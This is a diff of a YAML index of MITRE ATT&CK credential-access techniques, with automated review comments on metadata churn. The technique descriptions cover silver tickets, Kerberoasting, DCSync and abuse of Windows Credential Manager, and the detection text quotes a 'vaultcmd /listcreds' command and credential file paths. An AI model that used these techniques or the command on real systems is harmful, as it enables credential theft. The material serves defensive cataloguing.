+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/008
+ external_id: T1003.008
+ - source_name: Linux Password and Shadow File Formats
+ description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
+ File Formats. Retrieved February 19, 2020.
+ url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
+ - source_name: nixCraft - John the Ripper
+ description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
+ unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
+ 2020.'
+ url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.008
atomic_tests: []
T1558.002:
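Review bot: the detection text at L52939-52944 (and the description at L52927-52933 in the previous hunk) still carries the broken line splits around `/etc/passwd` and `/etc/shadow`, with fragments such as `, alerting on the pid,` starting a line, a leftover from stripping inline code markup; it is pre-existing, but since this regeneration rewrites the whole object, the generator should emit those spans inline. Separately, `x_mitre_permissions_required: - root` is dropped at L52956-52957, the same field removal as in T1552.006 and T1056.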
@@ -47728,7 +48460,7 @@ credential-access:
from Memory. Retrieved October 11, 2019.
url: https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
source_name: Medium Detecting Attempts to Steal Passwords from Memory
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T21:46:46.831Z'
name: 'Steal or Forge Kerberos Tickets: Silver Ticket'
description: |-
Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
@@ -47754,13 +48486,11 @@ credential-access:
- 'Logon Session: Logon Session Metadata'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1558.002
atomic_tests: []
T1555.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:44:35.906Z'
name: 'Credentials from Password Stores: Windows Credential Manager'
description: |-
Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
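Review bot: unlike the other objects in this change, where `x_mitre_attack_spec_version` is moved rather than deleted, T1558.002 loses it outright at L52999 with no re-addition visible in the hunk, and its `modified` value also regresses at L52989-52990 (2021-04-29 to 2020-03-25); confirm the field is re-added outside the shown context and that this object was refreshed from the same bundle as the rest.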
@@ -47777,24 +48507,24 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Bernaldo Penas Antelo
+ - Mugdha Peter Bansode
+ - Uriel Kosayev
+ - Vadim Khrykov
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor process and command-line parameters of vaultcmd.exe
for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., vaultcmd /listcreds:“Windows Credentials”
).(Citation: Malwarebytes The Windows Vault)
Consider monitoring API calls such as CredEnumerateA
that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
Consider monitoring file reads to Vault locations, %Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\
, for suspicious activity.(Citation: Malwarebytes The Windows Vault)
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Bernaldo Penas Antelo
- - Mugdha Peter Bansode
- - Uriel Kosayev
- - Vadim Khrykov
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
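Review bot: the command in the detection text at L53021, `vaultcmd /listcreds:“Windows Credentials”`, uses typographic quotes and is split across lines, so it will not paste into a shell as written; this is unchanged context, but since the object is being rewritten here it is a good moment for the generator to preserve the plain ASCII quotes from the source.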
@@ -47835,36 +48565,13 @@ credential-access:
url: https://www.passcape.com/windows_password_recovery_vault_explorer
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555.004
atomic_tests: []
T1556.001:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
- type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
@@ -47885,6 +48592,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -47899,52 +48607,42 @@ credential-access:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1556.005:
- technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.005:
+ technique:
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
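Review bot: `x_mitre_permissions_required: - Administrator` is removed from T1556.001 and nothing in the description or a replacement field carries the privilege requirement, so a consumer that ranks techniques by that property loses it silently. If the field is deprecated upstream, state that in the commit message and check that the index generator no longer reads it; otherwise keep the key. The `+ revoked: false` and `x_mitre_version: '2.1'` bump are consistent with the new `modified` timestamp.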
@@ -47966,6 +48664,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -47976,23 +48675,50 @@ credential-access:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1111:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:37:20.612Z'
name: Multi-Factor Authentication Interception
description: "Adversaries may target multi-factor authentication (MFA) mechanisms,
(i.e., smart cards, token generators, etc.) to gain access to credentials
@@ -48063,9 +48789,8 @@ credential-access:
url: https://sec.okta.com/scatterswine
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1003.003:
technique:
@@ -48124,12 +48849,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.003
atomic_tests: []
T1558.003:
technique:
- modified: '2023-03-30T21:01:46.538Z'
+ modified: '2024-09-23T22:20:10.994Z'
name: 'Steal or Forge Kerberos Tickets: Kerberoasting'
description: "Adversaries may abuse a valid Kerberos ticket-granting ticket
(TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket
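Review bot: T1003.003 loses `spec_version` but keeps `x_mitre_attack_spec_version: 3.1.0` (unchanged context line) while its neighbours move to 3.2.0. That is expected when the upstream object was not touched in the new release, but no `modified` line for it appears in the diff; spot-check that the object was refreshed from the same bundle rather than skipped by the generator.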
@@ -48161,6 +48885,7 @@ credential-access:
phase_name: credential-access
x_mitre_contributors:
- Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
TGS service ticket requests. Particularly investigate irregular patterns of
activity (ex: accounts making numerous requests, Event ID 4769, within a small
@@ -48170,7 +48895,6 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -48182,111 +48906,49 @@ credential-access:
id: attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee
created: '2020-02-11T18:43:38.588Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1558/003
external_id: T1558.003
+ - source_name: Microsoft Detecting Kerberoasting Feb 2018
+ description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+ using Azure Security Center. Retrieved March 23, 2018.
+ url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- source_name: Empire InvokeKerberoast Oct 2016
description: EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved
March 22, 2018.
url: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
+ - source_name: SANS Attacking Kerberos Nov 2014
+ description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+ Guard Dog of Hades. Retrieved March 22, 2018.
+ url: https://redsiege.com/kerberoast-slides
- source_name: AdSecurity Cracking Kerberos Dec 2015
description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
Domain. Retrieved March 22, 2018.
url: https://adsecurity.org/?p=2293
- - source_name: Microsoft Detecting Kerberoasting Feb 2018
- description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
- using Azure Security Center. Retrieved March 23, 2018.
- url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- - source_name: Microsoft SPN
- description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
- 2018.
- url: https://msdn.microsoft.com/library/ms677949.aspx
- source_name: Microsoft SetSPN
description: Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN
Syntax (Setspn.exe). Retrieved March 22, 2018.
url: https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
- - source_name: SANS Attacking Kerberos Nov 2014
- description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
- Guard Dog of Hades. Retrieved March 22, 2018.
- url: https://redsiege.com/kerberoast-slides
+ - source_name: Microsoft SPN
+ description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
+ 2018.
+ url: https://msdn.microsoft.com/library/ms677949.aspx
- source_name: Harmj0y Kerberoast Nov 2016
description: Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz.
- Retrieved March 23, 2018.
- url: https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
+ Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1558.003
atomic_tests: []
T1003.006:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ExtraHop
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
- type: attack-pattern
- created: '2020-02-11T18:45:34.293Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1003.006
- url: https://attack.mitre.org/techniques/T1003/006
- - url: https://msdn.microsoft.com/library/cc228086.aspx
- description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
- Service (DRS) Remote Protocol. Retrieved December 4, 2017.
- source_name: Microsoft DRSR Dec 2017
- - url: https://msdn.microsoft.com/library/dd207691.aspx
- description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
- 4, 2017.
- source_name: Microsoft GetNCCChanges
- - url: https://wiki.samba.org/index.php/DRSUAPI
- description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
- source_name: Samba DRSUAPI
- - url: https://source.winehq.org/WineAPI/samlib.html
- description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
- source_name: Wine API samlib.dll
- - url: https://adsecurity.org/?p=1729
- description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
- and Detection. Retrieved August 7, 2017.
- source_name: ADSecurity Mimikatz DCSync
- - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
- description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
- Oh My. Retrieved August 7, 2017.
- source_name: Harmj0y Mimikatz and DCSync
- - url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
- description: Warren, J. (2017, July 11). Manipulating User Passwords with
- Mimikatz. Retrieved December 4, 2017.
- source_name: InsiderThreat ChangeNTLM July 2017
- - url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
- description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
- August 7, 2017.
- source_name: GitHub Mimikatz lsadump Module
- - url: https://msdn.microsoft.com/library/cc237008.aspx
- description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
- Retrieved December 6, 2017.
- source_name: Microsoft NRPC Dec 2017
- - url: https://msdn.microsoft.com/library/cc245496.aspx
- description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
- Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
- source_name: Microsoft SAMR
- - url: https://adsecurity.org/?p=1729
- description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
- and Detection. Retrieved December 4, 2017.
- source_name: AdSecurity DCSync Sept 2015
- - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
- description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
- Oh My. Retrieved December 4, 2017.
- source_name: Harmj0y DCSync Sept 2015
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:54:08.312Z'
name: 'OS Credential Dumping: DCSync'
description: |-
Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
@@ -48297,26 +48959,88 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - ExtraHop
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Access'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
+ created: '2020-02-11T18:45:34.293Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/006
+ external_id: T1003.006
+ - source_name: GitHub Mimikatz lsadump Module
+ description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
+ August 7, 2017.
+ url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
+ - source_name: ADSecurity Mimikatz DCSync
+ description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+ and Detection. Retrieved August 7, 2017.
+ url: https://adsecurity.org/?p=1729
+ - source_name: AdSecurity DCSync Sept 2015
+ description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+ and Detection. Retrieved December 4, 2017.
+ url: https://adsecurity.org/?p=1729
+ - source_name: Microsoft DRSR Dec 2017
+ description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
+ Service (DRS) Remote Protocol. Retrieved December 4, 2017.
+ url: https://msdn.microsoft.com/library/cc228086.aspx
+ - source_name: Microsoft NRPC Dec 2017
+ description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
+ Retrieved December 6, 2017.
+ url: https://msdn.microsoft.com/library/cc237008.aspx
+ - source_name: Microsoft GetNCCChanges
+ description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
+ 4, 2017.
+ url: https://msdn.microsoft.com/library/dd207691.aspx
+ - source_name: Microsoft SAMR
+ description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
+ Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
+ url: https://msdn.microsoft.com/library/cc245496.aspx
+ - source_name: Samba DRSUAPI
+ description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
+ url: https://wiki.samba.org/index.php/DRSUAPI
+ - source_name: Harmj0y DCSync Sept 2015
+ description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+ Oh My. Retrieved December 4, 2017.
+ url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+ - source_name: Harmj0y Mimikatz and DCSync
+ description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+ Oh My. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+ - source_name: InsiderThreat ChangeNTLM July 2017
+ description: Warren, J. (2017, July 11). Manipulating User Passwords with
+ Mimikatz. Retrieved December 4, 2017.
+ url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
+ - source_name: Wine API samlib.dll
+ description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
+ url: https://source.winehq.org/WineAPI/samlib.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.006
atomic_tests: []
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
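Review bot: T1003.006 now carries the same article under two source names with different URLs: `Harmj0y DCSync Sept 2015` keeps `http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/` while `Harmj0y Mimikatz and DCSync` moves to `https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/`; the pair `ADSecurity Mimikatz DCSync` / `AdSecurity DCSync Sept 2015` likewise both point at `https://adsecurity.org/?p=1729`. The detection text cites `Harmj0y DCSync Sept 2015`, so the plain-http link to the old host is the one readers will follow; update it to the https host as well, or dedupe the two entries under one source name.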
@@ -48329,6 +49053,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -48365,17 +49090,17 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
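Review bot: the platform list swaps `Azure AD`, `Google Workspace` and `Office 365` for `Office Suite` and `Identity Provider`. Any index, filter or per-platform CSV that still matches on the old names will silently drop T1556; confirm the platform-keyed indexes are regenerated from this same source and that the generator has no hard-coded old platform strings, and mention the rename in the commit message since it changes what "Azure AD" consumers get back.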
@@ -48421,81 +49146,10 @@ credential-access:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.004:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
- type: attack-pattern
- created: '2020-02-11T19:01:15.930Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1056.004
- url: https://attack.mitre.org/techniques/T1056/004
- - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
- description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
- Retrieved December 18, 2017.
- url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
- - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
- description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
- source_name: Microsoft Hook Overview
- - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
